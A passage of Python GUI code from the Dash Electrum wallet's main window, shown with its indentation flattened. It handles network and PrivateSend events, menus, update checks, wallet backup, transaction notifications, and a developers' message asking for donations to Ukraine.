# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# dash net callbacks
util.register_callback(self.on_dash_net,
['dash-net-updated',
'dash-peers-updated'])
self.update_dash_net_status_btn()
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
self.show_backup_msg()
# PrivateSend manager callbacks
self.ps_signal.connect(self.on_ps_signal)
util.register_callback(self.on_ps_callback,
['ps-log-changes',
'ps-wfl-changes',
'ps-not-enough-sm-denoms',
'ps-other-coins-arrived',
'ps-keypairs-changes',
'ps-reserved-changes',
'ps-data-changes',
'ps-state-changes'])
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Dash Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Dash Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Dash Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
self._update_check_thread = None
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Dash Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_tabs_switch(self, x):
if self.tabs.currentIndex() == self.tabs.indexOf(self.send_tab):
self.update_available_amount()
def show_backup_msg(self):
if getattr(self.wallet.storage, 'backup_message', None):
self.show_warning(self.wallet.storage.backup_message,
title=_('Information'))
self.wallet.storage.backup_message = ''
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, PSFeeTooHigh):
self.show_error(e.detailed_msg())
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_dash_net(self, event, *args):
self.gui_object.dash_net_sobj.main.emit(event, args)
def on_dash_net_qt(self, event, args=None):
self.update_dash_net_status_btn()
def on_ps_callback(self, event, *args):
self.ps_signal.emit(event, args)
def on_ps_signal(self, event, args):
psman = self.wallet.psman
if event == 'ps-data-changes':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'ps-reserved-changes':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event in ['ps-state-changes', 'ps-wfl-changes',
'ps-keypairs-changes']:
wallet, msg, msg_type = (*args, None, None)[:3]
if wallet == self.wallet:
self.update_ps_status_btn()
if msg:
parent = self
d = find_ps_dialog(self)
if d:
d.incoming_msg = True
if not d.is_hiding:
show_ps_dialog(self, d)
parent = d
if msg_type and msg_type.startswith('inf'):
parent.show_message(msg, title=_('PrivateSend'))
else:
parent.show_warning(msg, title=_('PrivateSend'))
if d:
d.incoming_msg = False
elif event == 'ps-not-enough-sm-denoms':
wallet, denoms_by_vals = args
if wallet == self.wallet:
q = psman.create_sm_denoms_data(confirm_txt=True)
if self.question(q):
self.create_small_denoms(denoms_by_vals, self)
elif event == 'ps-other-coins-arrived':
wallet, txid = args
if wallet == self.wallet:
q = '\n\n'.join([psman.OTHER_COINS_ARRIVED_MSG1.format(txid),
psman.OTHER_COINS_ARRIVED_MSG2,
psman.OTHER_COINS_ARRIVED_MSG3,
psman.OTHER_COINS_ARRIVED_MSG4,
psman.OTHER_COINS_ARRIVED_Q])
if self.question(q):
utxo_is_shown = self.config.get('show_utxo_tab', False)
if not utxo_is_shown:
self.toggle_tab(self.utxo_tab)
utxo_idx = self.tabs.indexOf(self.utxo_tab)
if self.tabs.currentIndex() != utxo_idx:
self.tabs.setCurrentIndex(utxo_idx)
self.utxo_list.toggle_ps(2) # PS Other coins
def update_dash_net_status_btn(self):
net = self.network
icon = (net.dash_net.status_icon() if net else 'dash_net_off.png')
self.dash_net_button.setIcon(read_QIcon(icon))
def update_ps_status_btn(self):
icon = 'privatesend.png'
status = _('Is Idle')
if self.wallet:
psman = self.wallet.psman
if psman.in_transit:
icon = 'privatesend_hg.png'
status = _('Is Mixing')
elif psman.is_waiting:
icon = 'privatesend_waiting.png'
status = _('Is Waiting')
elif psman.state in psman.mixing_running_states:
icon = 'privatesend_active.png'
status = _('Is Mixing')
self.ps_button.setIcon(read_QIcon(icon))
ps = _('PrivateSend')
tooltip = f'{ps} {status}'
self.ps_button.setToolTip(tooltip)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
if wallet.psman.need_notify(tx.txid()):
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'verified-islock':
wallet, tx_hash = args
if wallet == self.wallet:
self.need_update.set()
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
elif event == 'excessive-resource-usage':
self.notify(args[0])
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.dip3_tab.w_model.reload_data()
self.dip3_tab.update_wallet_label()
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Dash Electrum | Glory to Ukraine | Slava Ukraini! | "
if constants.net.TESTNET:
name += " " + constants.net.NET_NAME.capitalize()
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def ukraine_info(self):
info_uri = 'https://my.kuna.io/en/kunaid-ukraine'
info = (f'On Feb 24th at 4AM, Russian Federation'
f' launched an all-in offensive against'
f' peacefull Ukrainian cities and citizens.'
f'<br/><br/>'
f'Dash Electrum team lives in Ukraine and loves Ukraine.'
f' You can help our fight against Russian invasion'
f' by donating at: '
f'<p><a href="{info_uri}">{info_uri}</a></p>'
f'<p>Slava Ukraini! Heroiam Slava!</p>')
self.show_message(info, title='Dash Electrum | Ukraine info',
rich_text=True)
def warn_if_watching_only(self):
watch_only_warn = self.config.get('watch_only_warn', True)
if self.wallet.is_watching_only() and watch_only_warn:
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Dash coins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Dash coins to be sent to this wallet.")
])
cb = QCheckBox(_("Don't show this again."))
def on_cb(x):
self.config.set_key('watch_only_warn', x != Qt.Checked,
save=True)
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Watch-only wallet'), checkbox=cb)
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Dash network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Dash Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
def export_privk_dlg():
self.export_privkeys_dialog(mwin=self, parent=self)
self.export_menu = self.private_keys_menu.addAction(_("&Export"),
export_privk_dlg)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
addresses_menu = wallet_menu.addMenu(_("&Coins"))
addresses_menu.addAction(_("&Filter"), lambda: self.utxo_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
invoices_menu.addAction(_("Export With Extensions"),
lambda: self.export_invoices_with_ext())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.dip3_tab)
add_toggle_action(view_menu, self.console_tab)
wallet_menu.addSeparator()
wallet_menu.addAction(_('PrivateSend'),
lambda: show_ps_dialog_or_wizard(self))
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Dash Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction('Help Ukraine', self.ukraine_info)
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.dash.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("https://docs.dash.org/en/stable/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents)
self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True)
self._auto_crash_reports.setChecked(self.config.get(BaseCrashReporter.config_key, default=True))
self._auto_crash_reports.triggered.connect(self.auto_crash_reports)
help_menu.addAction(self._auto_crash_reports)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def auto_crash_reports(self, state):
self.config.set_key(BaseCrashReporter.config_key, state, True)
for w in self.gui_object.windows:
w._auto_crash_reports.setChecked(state)
Exception_Hook.show_need_restart_msg(self)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('dash:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Dash Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Dash.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Dash system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Dash Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Dash Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Dash Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Dash Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
self.console_tab.lock_if_need()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
not_connected_msg = _('Electrum network not connected')
if self.network.proxy:
text = "{} ({})".format(not_connected_msg, _("proxy enabled"))
else:
text = not_connected_msg
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.update_available_amount()
self.update_receive_address_styling()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = SizedFreezableLineEdit(width=700)
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
